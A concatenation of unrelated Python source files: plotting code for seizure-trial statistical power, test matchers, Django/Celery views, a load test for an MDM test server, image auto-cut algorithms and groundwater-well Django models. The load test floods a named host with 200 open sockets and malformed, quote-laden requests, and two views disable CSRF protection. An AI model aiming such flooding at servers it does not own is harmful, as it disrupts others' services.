n_groups = 3
index = np.arange(n_groups)
bar_width = 0.35
opacity = 0.8
NV_model_one_endpoint_stat_powers = 100*np.array([expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power])
NV_model_two_endpoint_stat_powers = 100*np.array([expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power])
reg_prop = fm.FontProperties(fname='/Users/juanromero/Documents/GitHub/rct-SNR/Calibri Regular.ttf')
bold_prop = fm.FontProperties(fname='/Users/juanromero/Documents/GitHub/rct-SNR/Calibri Bold.ttf')
fig = plt.figure(figsize=(20, 6))
ax = plt.subplot(1,2,1)
ax = sns.heatmap(NV_model_one_and_two_patient_pop_hist, cmap='RdBu_r', cbar_kws={'label':'Number of patients'})
cbar = ax.collections[0].colorbar
ax.set_xticks(monthly_mean_ticks)
ax.set_xticklabels(monthly_mean_tick_labels, rotation='horizontal')
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(11)
ax.set_yticks(monthly_std_dev_ticks)
ax.set_yticklabels(monthly_std_dev_tick_labels, rotation='horizontal')
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(11)
cbar.set_label('SNR of location', fontproperties=reg_prop, fontsize=14)
ax.set_xlabel(r'monthly seizure count mean, $\mu$', fontproperties=reg_prop, fontsize=14)
ax.set_ylabel(r'monthly seizure count standard deviation, $\sigma$', fontproperties=reg_prop, fontsize=14)
ax.title.set_text('2D histograms of patients from NV model 1 and 2')
ax.text(-0.2, 1, string.ascii_uppercase[0] + ')',
fontproperties=bold_prop, transform=ax.transAxes, size=20)
NV_model_1_rect = rectangle((0.5, 11.5), 5, 3, 0, edgecolor='xkcd:apple green', facecolor='none', linewidth=3)
NV_model_2_rect = rectangle((5.5, 9.5), 7, 4, 0, edgecolor='xkcd:vivid green', facecolor='none', linewidth=3)
ax.add_artist(NV_model_1_rect)
ax.add_artist(NV_model_2_rect)
ax.text(0.6, 11.2,
'NV Model 1',
fontproperties=reg_prop,
fontsize=16,
color='white')
ax.text(8.6, 9.2,
'NV Model 2',
fontproperties=reg_prop,
fontsize=16,
color='white')
'''
fontdict = {'family': 'serif',
'color': 'white',
'weight': 'normal',
'size': 16}
'''
#ax.legend([NV_model_1_rect, NV_model_2_rect], ['NV Model 1', 'NV Model 2'], loc='upper left')
plt.subplot(1,2,2)
plt.bar(index,
NV_model_one_endpoint_stat_powers,
bar_width,
alpha=opacity,
color='b',
label='NV Model one')
plt.bar(index + bar_width,
NV_model_two_endpoint_stat_powers,
bar_width,
alpha=opacity,
color='g',
label='NV Model two')
plt.xlabel('endpoint', fontproperties=reg_prop, fontsize=14)
plt.ylabel('statistical power', fontproperties=reg_prop, fontsize=14)
plt.title('average predicted statistical powers', fontproperties=reg_prop, fontsize=14)
plt.xticks(index + bar_width/2, ('RR50', 'MPC', 'TTP'), fontproperties=reg_prop, fontsize=14)
plt.yticks(np.arange(0, 110, 10))
ax = plt.gca()
ax.yaxis.set_major_formatter(ticker.PercentFormatter(xmax=100))
ax.yaxis.grid(True)
plt.legend(prop=reg_prop)
ax.text(-0.2, 1, string.ascii_uppercase[1] + ')',
fontproperties=bold_prop, transform=ax.transAxes, size=20, weight='bold')
plt.subplots_adjust(wspace = .25)
png1 = io.BytesIO()
fig.savefig(png1, dpi = 600, bbox_inches = 'tight', format = 'png')
png2 = Image.open(png1)
png2.save('Romero-fig4.tiff')
png1.close()
def take_inputs_from_command_shell():
monthly_mean_min = int(sys.argv[1])
monthly_mean_max = int(sys.argv[2])
monthly_std_dev_min = int(sys.argv[3])
monthly_std_dev_max = int(sys.argv[4])
expected_NV_model_responses_file_name = sys.argv[5]
NV_model_hist_file_name = sys.argv[6]
return [monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max,
expected_NV_model_responses_file_name,
NV_model_hist_file_name]
if(__name__=='__main__'):
[monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max,
expected_NV_model_responses_file_name,
NV_model_hist_file_name] = \
take_inputs_from_command_shell()
[expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist] = \
retrieve_expected_responses_and_hist(expected_NV_model_responses_file_name,
NV_model_hist_file_name)
plot_predicted_statistical_powers_and_NV_model_hists(expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist,
monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max)
|
from datetime import timedelta
from operator import methodcaller
from testtools.content import text_content
from testtools.matchers import AfterPreprocessing as After
from testtools.matchers import (
Equals, GreaterThan, IsInstance, LessThan, MatchesAll, MatchesAny,
MatchesStructure, Mismatch)
class HasHeader(Equals):
def __init__(self, key, values):
"""
Checks for a certain header with certain values in the headers of a
response or request. Note that headers may be specified multiple times
and that the order of repeated headers is important.
:param str key:
The header name/key.
:param list values:
The list of values for the header.
"""
super(HasHeader, self).__init__(values)
self.key = key
def __str__(self):
return 'HasHeader(%s, %r)' % (self.key, self.expected,)
def match(self, headers):
"""
:param twisted.web.http_headers.Headers headers:
The response or request headers object.
"""
if not headers.hasHeader(self.key):
headers_content = text_content(
repr(dict(headers.getAllRawHeaders())))
return Mismatch(
'The response does not have a "%s" header' % (self.key,),
details={'raw headers': headers_content})
raw_values = headers.getRawHeaders(self.key)
return super(HasHeader, self).match(raw_values)
def IsJsonResponseWithCode(code):
"""
Match the status code on a treq.response object and check that a header is
set to indicate that the content type is JSON.
"""
return MatchesStructure(
code=Equals(code),
headers=HasHeader('Content-Type', ['application/json'])
)
def WithErrorTypeAndMessage(error_type, message):
"""
Check that a Twisted failure was caused by a certain error type with a
certain message.
"""
return MatchesAll(
MatchesStructure(value=IsInstance(error_type)),
After(methodcaller('getErrorMessage'), Equals(message))
)
def matches_time_or_just_before(time, tolerance=timedelta(seconds=10)):
"""
Match a time to be equal to a certain time or just before it. Useful when
checking for a time that is now +/- some amount of time.
"""
return MatchesAll(
GreaterThan(time - tolerance),
MatchesAny(LessThan(time), Equals(time)))
|
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from tasks.sample_tasks import create_task
from celery.result import AsyncResult
def home(request):
return render(request, "home.html")
@csrf_exempt
def run_task(request):
if request.POST:
task_type = request.POST.get("type")
task = create_task.delay(int(task_type))
return JsonResponse({"task_id": task.id}, status=202)
@csrf_exempt
def get_status(request, task_id):
task_result = AsyncResult(task_id)
result = {
"task_id": task_id,
"task_status": task_result.status,
"task_result": task_result.result
}
return JsonResponse(result, status=200)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import subprocess
import urllib2
import json
import time
import sys, os
import multiprocessing
sys.path.append(os.path.abspath(__file__ + '/../../library/'))
import copiedRequests
MDM_HOST = "tst-mdm.safekiddo.com"
PORT = 443
TIMEOUT = 5
DISCOVERY = "discovery"
DISCOVERY_MALFORMED = "discoveryMalformed"
DISCOVERY_WRONG_HEADER = "discoveryWrongHeader"
ENROLLMENT = "enrollment"
ENROLLMENT_MALFORMED = "enrollmentMalformed"
ENROLLMENT_WRONG_HEADER = "enrollmentWrongHeader"
OMADM = "omadm"
OMADM_MALFORMED = "omadmMalformed"
OMADM_WRONG_HEADER = "omadmWrongHeader"
DEVICE_ID = "43"
DEVICE_HARDWARE_ID = "6CAF8D6F-4A44-5802-A7A2-E79E344BABD4"
threads = []
def sendHealthChecks():
for i in (1, 10):
req = urllib2.Request("https://%s:%d/healthCheck/" % (MDM_HOST, PORT))
result = urllib2.urlopen(req, timeout = TIMEOUT).read()
time.sleep(1)
def sendRequest(type):
opener = urllib2.build_opener()
headers = None
data = None
catchServerError = False
url = "https://%s:%d/" % (MDM_HOST, PORT)
if type == DISCOVERY:
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getDiscoveryXml()
if type == DISCOVERY_MALFORMED:
catchServerError = True
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getDiscoveryXml()[7:50]
if type == DISCOVERY_WRONG_HEADER:
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getDiscoveryXml()
if type == ENROLLMENT:
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getEnrollmentXml("[email protected]", "1234")
if type == ENROLLMENT_MALFORMED:
catchServerError = True
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getEnrollmentXml('">\'<', '">\'<')
if type == ENROLLMENT_WRONG_HEADER:
catchServerError = True
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getEnrollmentXml('">\'<', '">\'<')
if type == OMADM:
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)
if type == OMADM_MALFORMED:
catchServerError = True
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)[11:30]
if type == OMADM_WRONG_HEADER:
catchServerError = True
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)
try:
request = urllib2.Request(url, data=data, headers=headers)
response = opener.open(request)
except urllib2.HTTPError:
if not catchServerError:
raise
def main():
sockets = {}
SOCKET_NUM = 200
for i in range(SOCKET_NUM):
sockets[i] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockets[i].connect((MDM_HOST, PORT))
print "%d sockets are opened" % SOCKET_NUM
HEALTHCHECK_NUM = 50
for i in range(HEALTHCHECK_NUM):
thread = multiprocessing.Process(target=sendHealthChecks)
threads.append(thread)
thread.start()
print "%d healtcheck threads started" % HEALTHCHECK_NUM
REPORT_REQUESTS_NUM = 10
types = [
DISCOVERY,
ENROLLMENT,
OMADM,
DISCOVERY_MALFORMED,
ENROLLMENT_MALFORMED,
OMADM_MALFORMED,
DISCOVERY_WRONG_HEADER,
ENROLLMENT_WRONG_HEADER,
OMADM_WRONG_HEADER
]
for i in range(REPORT_REQUESTS_NUM):
for type in types:
thread = multiprocessing.Process(target=sendRequest, args=[type])
threads.append(thread)
thread.start()
print "%d reports threads started" % (REPORT_REQUESTS_NUM * len(types))
if __name__ == '__main__':
try:
cleanExit = True
try:
main()
except (SystemExit, KeyboardInterrupt):
pass # --help in arguments
except:
cleanExit = False
raise
finally:
for t in threads:
t.join()
if cleanExit:
assert t.exitcode == 0, "thread exitcode should be 0 but is %s" % t.exitcode
print "OK"
|
import confuse as cf
def configure():
config = cf.Configuration('bud', __name__)
config.set_file('./config.yaml')
return config
def get_path():
cfg = configure()
return str(cfg["directory_path"])
|
# -*- encoding: utf-8 -*-
from habet.response import Response
class BaseServerError(Exception):
def __init__(self):
self.status = None
self.code = None
self.message = None
self.data = None
self.content_type = 'application/json'
def as_response(self):
body = {
'error': {
'code': self.code,
'message': self.message,
'data': self.data
}
}
headers = {
'Content-Type': self.content_type
}
return Response(status=self.status, headers=headers, body=body)
class MethodNotAllowedError(BaseServerError):
def __init__(self, method=None, path=None):
super(MethodNotAllowedError, self).__init__()
self.status = 405
self.code = -32000
self.message = 'Method not allowed.'
self.data = {
'method': method,
'path': path
}
class UnauthorizedError(BaseServerError):
def __init__(self, method=None, path=None):
super(UnauthorizedError, self).__init__()
self.status = 401
self.code = -32001
self.message = 'Unauthorized.'
self.data = {
'method': method,
'path': path
}
class ForbiddenError(BaseServerError):
def __init__(self, method=None, path=None):
super(ForbiddenError, self).__init__()
self.status = 403
self.code = -32002
self.message = 'Forbidden.'
self.data = {
'method': method,
'path': path
}
class NotFoundError(BaseServerError):
def __init__(self, method=None, path=None):
super(NotFoundError, self).__init__()
self.status = 404
self.code = -32004
self.message = 'Resource/path not found.'
self.data = {
'method': method,
'path': path
}
class InternalError(BaseServerError):
def __init__(self, method=None, path=None):
super(InternalError, self).__init__()
self.status = 500
self.code = -32099
self.message = 'Internal/Unknown server error.'
self.data = {
'method': method,
'path': path
}
|
#
# AutoCuts.py -- class for calculating auto cut levels
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy as np
from ginga.misc import Bunch
#from ginga.misc.ParamSet import Param
from ginga.util import zscale
have_scipy = True
autocut_methods = ('minmax', 'median', 'histogram', 'stddev', 'zscale')
try:
import scipy.ndimage.filters
except ImportError:
have_scipy = False
autocut_methods = ('minmax', 'histogram', 'stddev', 'zscale')
class Param(Bunch.Bunch):
pass
class AutoCutsError(Exception):
pass
class AutoCutsBase(object):
@classmethod
def get_params_metadata(cls):
return []
def __init__(self, logger):
super(AutoCutsBase, self).__init__()
self.logger = logger
self.kind = 'base'
self.crop_radius = 512
def update_params(self, **param_dict):
# TODO: find a cleaner way to update these
self.__dict__.update(param_dict)
def get_algorithms(self):
return autocut_methods
def get_autocut_levels(self, image):
loval, hival = self.calc_cut_levels(image)
return loval, hival
def get_crop(self, image, crop_radius=None):
# Even with numpy, it's kind of slow for some of the autocut
# methods on a large image, so in those cases we can optionally
# take a crop of size (radius*2)x(radius*2) from the center of
# the image and calculate the cut levels on that
if crop_radius is None:
crop_radius = self.crop_radius
wd, ht = image.get_size()
(data, x1, y1, x2, y2) = image.cutout_radius(wd // 2, ht // 2,
crop_radius)
return data
def cut_levels(self, data, loval, hival, vmin=0.0, vmax=255.0):
loval, hival = float(loval), float(hival)
# ensure hival >= loval
hival = max(loval, hival)
self.logger.debug("loval=%.2f hival=%.2f" % (loval, hival))
delta = hival - loval
if delta > 0.0:
f = (((data - loval) / delta) * vmax)
# NOTE: optimization using in-place outputs for speed
f.clip(0.0, vmax, out=f)
return f
# hival == loval, so thresholding operation
f = (data - loval).clip(0.0, vmax)
f[f > 0.0] = vmax
return f
def __str__(self):
return self.kind
class Clip(AutoCutsBase):
def __init__(self, logger):
super(Clip, self).__init__(logger)
self.kind = 'clip'
def calc_cut_levels(self, image):
loval, hival = image.get_minmax()
return (float(loval), float(hival))
def cut_levels(self, data, loval, hival, vmin=0.0, vmax=255.0):
return data.clip(vmin, vmax)
class Minmax(AutoCutsBase):
def __init__(self, logger):
super(Minmax, self).__init__(logger)
self.kind = 'minmax'
def calc_cut_levels(self, image):
loval, hival = image.get_minmax()
return (float(loval), float(hival))
class Histogram(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
Param(name='usecrop', type=_bool,
valid=[True, False],
default=True,
description="Use center crop of image for speed"),
Param(name='pct', type=float,
widget='spinfloat', incr=0.001,
min=0.0, max=1.0, default=0.999,
description="Percentage of the histogram to retain"),
Param(name='numbins', type=int,
min=100, max=10000, default=2048,
description="Number of bins for the histogram"),
]
def __init__(self, logger, usecrop=True, pct=0.999, numbins=2048):
super(Histogram, self).__init__(logger)
self.kind = 'histogram'
self.usecrop = usecrop
self.pct = pct
self.numbins = numbins
def calc_cut_levels(self, image):
if self.usecrop:
data = self.get_crop(image)
count = np.count_nonzero(np.isfinite(data))
if count < (self.crop_radius ** 2.0) * 0.50:
# if we have less than 50% finite pixels then fall back
# to using the whole array
self.logger.debug("too many non-finite values in crop--"
"falling back to full image data")
data = image.get_data()
else:
data = image.get_data()
bnch = self.calc_histogram(data, pct=self.pct, numbins=self.numbins)
loval, hival = bnch.loval, bnch.hival
return loval, hival
def calc_histogram(self, data, pct=1.0, numbins=2048):
self.logger.debug("Computing histogram, pct=%.4f numbins=%d" % (
pct, numbins))
height, width = data.shape[:2]
self.logger.debug("Median analysis array is %dx%d" % (
width, height))
total_px = width * height
dsum = np.sum(data)
if np.isnan(dsum) or np.isinf(dsum):
# Oh crap, the array has a NaN or Inf value.
# We have to workaround this by making a copy of the array
# and substituting for the problem values, otherwise numpy's
# histogram() cannot handle it
self.logger.warning("NaN's found in data, using workaround for histogram")
data = data.copy()
# TODO: calculate a reasonable replacement value
data[np.isinf(data)] = 0.0
minval = np.nanmin(data)
maxval = np.nanmax(data)
substval = (minval + maxval) / 2.0
data[np.isnan(data)] = substval
data[np.isinf(data)] = substval
## dsum = np.sum(data)
## if np.isnan(dsum) or np.isinf(dsum):
## print "NaNs STILL PRESENT"
dist, bins = np.histogram(data, bins=numbins,
density=False)
else:
dist, bins = np.histogram(data, bins=numbins,
density=False)
cutoff = int((float(total_px) * (1.0 - pct)) / 2.0)
top = len(dist) - 1
self.logger.debug("top=%d cutoff=%d" % (top, cutoff))
#print "DIST: %s\nBINS: %s" % (str(dist), str(bins))
# calculate low cutoff
cumsum = np.cumsum(dist)
li = np.flatnonzero(cumsum > cutoff)
if len(li) > 0:
i = li[0]
count_px = cumsum[i]
else:
i = 0
count_px = 0
if i > 0:
nprev = cumsum[i - 1]
else:
nprev = 0
loidx = i
# interpolate between last two low bins
val1, val2 = bins[i], bins[i + 1]
divisor = float(count_px) - float(nprev)
if divisor > 0.0:
interp = (float(cutoff) - float(nprev)) / divisor
else:
interp = 0.0
loval = val1 + ((val2 - val1) * interp)
self.logger.debug("loval=%f val1=%f val2=%f interp=%f" % (
loval, val1, val2, interp))
# calculate high cutoff
revdist = dist[::-1]
cumsum = np.cumsum(revdist)
li = np.flatnonzero(cumsum > cutoff)
if len(li) > 0:
i = li[0]
count_px = cumsum[i]
else:
i = 0
count_px = 0
if i > 0:
nprev = cumsum[i - 1]
else:
nprev = 0
j = top - i
hiidx = j + 1
# interpolate between last two high bins
val1, val2 = bins[j], bins[j + 1]
divisor = float(count_px) - float(nprev)
if divisor > 0.0:
interp = (float(cutoff) - float(nprev)) / divisor
else:
interp = 0.0
hival = val1 + ((val2 - val1) * interp)
self.logger.debug("hival=%f val1=%f val2=%f interp=%f" % (
hival, val1, val2, interp))
return Bunch.Bunch(dist=dist, bins=bins, loval=loval, hival=hival,
loidx=loidx, hiidx=hiidx)
class StdDev(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
Param(name='usecrop', type=_bool,
valid=[True, False],
default=True,
description="Use center crop of image for speed"),
## Param(name='hensa_lo', type=float, default=35.0,
## description="Low subtraction factor"),
## Param(name='hensa_hi', type=float, default=90.0,
## description="High subtraction factor"),
]
def __init__(self, logger, usecrop=True):
super(StdDev, self).__init__(logger)
self.kind = 'stddev'
# Constants used to calculate the lo and hi cut levels using the
# "stddev" algorithm (from the old SOSS fits viewer)
self.usecrop = usecrop
self.hensa_lo = 35.0
self.hensa_hi = 90.0
def calc_cut_levels(self, image):
if self.usecrop:
data = self.get_crop(image)
count = np.count_nonzero(np.isfinite(data))
if count < (self.crop_radius ** 2.0) * 0.50:
# if we have less than 50% finite pixels then fall back
# to using the whole array
self.logger.info("too many non-finite values in crop--"
"falling back to full image data")
data = image.get_data()
else:
data = image.get_data()
loval, hival = self.calc_stddev(data, hensa_lo=self.hensa_lo,
hensa_hi=self.hensa_hi)
return loval, hival
def calc_stddev(self, data, hensa_lo=35.0, hensa_hi=90.0):
# This is the method used in the old SOSS fits viewer
mdata = np.ma.masked_array(data, np.isnan(data))
mean = np.mean(mdata)
sdev = np.std(mdata)
self.logger.debug("mean=%f std=%f" % (mean, sdev))
hensa_lo_factor = (hensa_lo - 50.0) / 10.0
hensa_hi_factor = (hensa_hi - 50.0) / 10.0
loval = hensa_lo_factor * sdev + mean
hival = hensa_hi_factor * sdev + mean
return loval, hival
class MedianFilter(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
## Param(name='usecrop', type=_bool,
## valid=set([True, False]),
## default=True,
## description="Use center crop of image for speed"),
Param(name='num_points', type=int,
default=2000, allow_none=True,
description="Number of points to sample"),
Param(name='length', type=int, default=5,
description="Median kernel length"),
]
def __init__(self, logger, num_points=2000, length=5):
super(MedianFilter, self).__init__(logger)
self.kind = 'median'
self.num_points = num_points
self.length = length
def calc_cut_levels(self, image):
wd, ht = image.get_size()
# sample the data
xmax = wd - 1
ymax = ht - 1
# evenly spaced sampling over rows and cols
xskip = int(max(1.0, np.sqrt(xmax * ymax / float(self.num_points))))
yskip = xskip
cutout = image.cutout_data(0, 0, xmax, ymax,
xstep=xskip, ystep=yskip)
loval, hival = self.calc_medianfilter(cutout, length=self.length)
return loval, hival
def calc_medianfilter(self, data, length=5):
assert len(data.shape) >= 2, \
AutoCutsError("input data should be 2D or greater")
if length is None:
length = 5
xout = scipy.ndimage.filters.median_filter(data, size=length)
loval = np.nanmin(xout)
hival = np.nanmax(xout)
return loval, hival
class ZScale(AutoCutsBase):
"""
Based on STScI's numdisplay implementation of IRAF's ZScale.
"""
@classmethod
def get_params_metadata(cls):
return [
Param(name='contrast', type=float,
default=0.25, allow_none=False,
description="Contrast"),
Param(name='num_points', type=int,
default=1000, allow_none=True,
description="Number of points to sample"),
]
def __init__(self, logger, contrast=0.25, num_points=1000):
super(ZScale, self).__init__(logger)
self.kind = 'zscale'
self.contrast = contrast
self.num_points = num_points
def calc_cut_levels(self, image):
wd, ht = image.get_size()
# calculate num_points parameter, if omitted
total_points = wd * ht
if total_points == 0:
self.logger.debug('total_points is 0, setting cut levels to 0')
return 0, 0
num_points = self.num_points
if num_points is None:
num_points = max(int(total_points * 0.0002), 1000)
num_points = min(num_points, total_points)
assert (0 < num_points <= total_points), \
AutoCutsError("num_points not in range 0-%d" % (total_points))
# sample the data
xmax = wd - 1
ymax = ht - 1
# evenly spaced sampling over rows and cols
xskip = int(max(1.0, np.sqrt(xmax * ymax / float(num_points))))
yskip = xskip
cutout = image.cutout_data(0, 0, xmax, ymax,
xstep=xskip, ystep=yskip)
loval, hival = self.calc_zscale(cutout, contrast=self.contrast,
num_points=self.num_points)
return loval, hival
def calc_zscale(self, data, contrast=0.25, num_points=1000):
# NOTE: num_per_row is ignored in this implementation
assert len(data.shape) >= 2, \
AutoCutsError("input data should be 2D or greater")
ht, wd = data.shape[:2]
# sanity check on contrast parameter
assert (0.0 < contrast <= 1.0), \
AutoCutsError("contrast (%.2f) not in range 0 < c <= 1" % (
contrast))
# remove masked elements, they cause problems
data = data[np.logical_not(np.ma.getmaskarray(data))]
# remove NaN and Inf from samples
samples = data[np.isfinite(data)].flatten()
samples = samples[:num_points]
loval, hival = zscale.zscale_samples(samples, contrast=contrast)
return loval, hival
# funky boolean converter
_bool = lambda st: str(st).lower() == 'true' # noqa
autocuts_table = {
'clip': Clip,
'minmax': Minmax,
'stddev': StdDev,
'histogram': Histogram,
'median': MedianFilter,
'zscale': ZScale,
}
def get_autocuts(name):
if name not in autocut_methods:
raise AutoCutsError("Method '%s' is not supported" % (name))
return autocuts_table[name]
def get_autocuts_names():
l = list(autocuts_table.keys())
l.sort()
return l
# END
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import uuid
import math
import reversion
from decimal import Decimal
from django.core.validators import MinValueValidator
from django.utils import timezone
from django.dispatch import receiver
from django.db.models.signals import pre_save
from django.contrib.gis.db import models
from django.contrib.gis.gdal import SpatialReference, CoordTransform
from gwells.models import AuditModel, ProvinceStateCode, ScreenIntakeMethodCode, ScreenMaterialCode,\
ScreenOpeningCode, ScreenBottomCode, ScreenTypeCode, ScreenAssemblyTypeCode, CodeTableModel,\
BasicCodeTableModel
from gwells.models.common import AuditModelStructure
from gwells.models.lithology import (
LithologyDescriptionCode, LithologyColourCode, LithologyHardnessCode,
LithologyMaterialCode, BedrockMaterialCode, BedrockMaterialDescriptorCode, LithologyStructureCode,
LithologyMoistureCode, SurficialMaterialCode)
from gwells.db_comments.patch_fields import patch_fields
# from aquifers.models import Aquifer
patch_fields()
WELL_STATUS_CODE_CONSTRUCTION = 'NEW'
WELL_STATUS_CODE_DECOMMISSION = 'CLOSURE'
WELL_STATUS_CODE_ALTERATION = 'ALTERATION'
WELL_STATUS_CODE_OTHER = 'OTHER'
class DecommissionMethodCode(CodeTableModel):
decommission_method_code = models.CharField(primary_key=True, max_length=10, editable=False,
verbose_name="Code")
description = models.CharField(max_length=255, verbose_name="Description")
class Meta:
db_table = 'decommission_method_code'
ordering = ['display_order']
db_table_comment = 'Describes the method used to fill the well to close it permanently.'
def __str__(self):
return self.description
class BCGS_Numbers(AuditModel):
bcgs_id = models.BigIntegerField(primary_key=True, editable=False)
bcgs_number = models.CharField(
max_length=20, verbose_name="BCGS Mapsheet Number")
class Meta:
db_table = 'bcgs_number'
db_table_comment = 'Placeholder table comment.'
def __str__(self):
return self.bcgs_number
class ObsWellStatusCode(CodeTableModel):
"""
Observation Well Status.
"""
obs_well_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=255)
class Meta:
db_table = 'obs_well_status_code'
ordering = ['display_order', 'obs_well_status_code']
db_table_comment = ('Status of an observation well within the Provincial Groundwater Observation Well '
'Network. I.e. Active is a well that is currently being used to collect groundwater '
'information, and inactive is a well that is no longer being used to collect '
'groundwater information.')
def save(self, *args, **kwargs):
self.validate()
super(WellStatusCode, self).save(*args, **kwargs)
class YieldEstimationMethodCode(CodeTableModel):
"""
The method used to estimate the yield of a well, e.g. Air Lifting, Bailing, Pumping.
"""
yield_estimation_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'yield_estimation_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the valid methods that can be used to estimate the yield of a well. E.g.'
' Air Lifting, Bailing, Pumping, Other.')
def __str__(self):
return self.description
class WaterQualityCharacteristic(AuditModel):
"""
The characteristic of the well water, e.g. Fresh, Salty, Clear.
"""
code = models.CharField(primary_key=True, max_length=10,
db_column='water_quality_characteristic_code')
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField(
db_comment='The order in which the codes may display on screen.'
)
class Meta:
db_table = 'water_quality_characteristic'
ordering = ['display_order', 'description']
db_table_comment = ('Valid values that can be used to indicate the quality of the water for a well as'
' recorded at time of work. E.g. Clear, Cloudy, Fresh, Gas, Salty, Sediment.')
def __str__(self):
return self.description
class DevelopmentMethodCode(CodeTableModel):
"""
How the well was developed in order to remove the fine sediment and other organic or inorganic material
that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well,
e.g. air lifting, pumping, bailing.
"""
development_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'development_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('The methods used to remove the fine sediment and other organic or inorganic '
'material that immediately surrounds the well screen, the drill hole or the intake '
'area at the bottom of the well. E.g. Air Lifting, Bailing, Jetting, Pumping, '
'Surging. \'Other\' can also be specified.')
def __str__(self):
return self.description
class FilterPackMaterialSizeCode(CodeTableModel):
"""
The size of material used to pack a well filter, e.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.
"""
filter_pack_material_size_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'filter_pack_material_size_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for the sizes of the material used to pack a well filter. Some examples of '
'filter pack sizes are: 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.')
def __str__(self):
return self.description
class BoundaryEffectCode(CodeTableModel):
"""
The observed boundary effect in the pumping test analysis.
"""
boundary_effect_code = models.CharField(primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'boundary_effect_code'
ordering = ['display_order', 'description']
db_table_comment = ('The observed boundary effect in the pumping test analysis. Constant head or '
'no flow boundaries are two possible observations.')
def __str__(self):
return self.description
class WellDisinfectedCode(CodeTableModel):
"""
The status on whether the well has been disinfected or not.
"""
well_disinfected_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_disinfected_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for the well disinfected status. If the disinfected status on a legacy well'
'is unkown, then the null status is mapped to the Unkown value.')
def __str__(self):
return self.description
class WellOrientationCode(CodeTableModel):
"""
Codes describing the orientation of the well
"""
well_orientation_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_orientation_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for the well orienation. Horizontal and Vertical are the only codes at this point')
def __str__(self):
return self.description
class DriveShoeCode(CodeTableModel):
"""
The status on whether a casing has a drive shoe installed.
"""
drive_shoe_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'drive_shoe_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for drive shoe installation on a casing.')
def __str__(self):
return self.description
class FilterPackMaterialCode(CodeTableModel):
"""
The material used to pack a well filter, e.g. Very coarse sand, Very fine gravel, Fine gravel.
"""
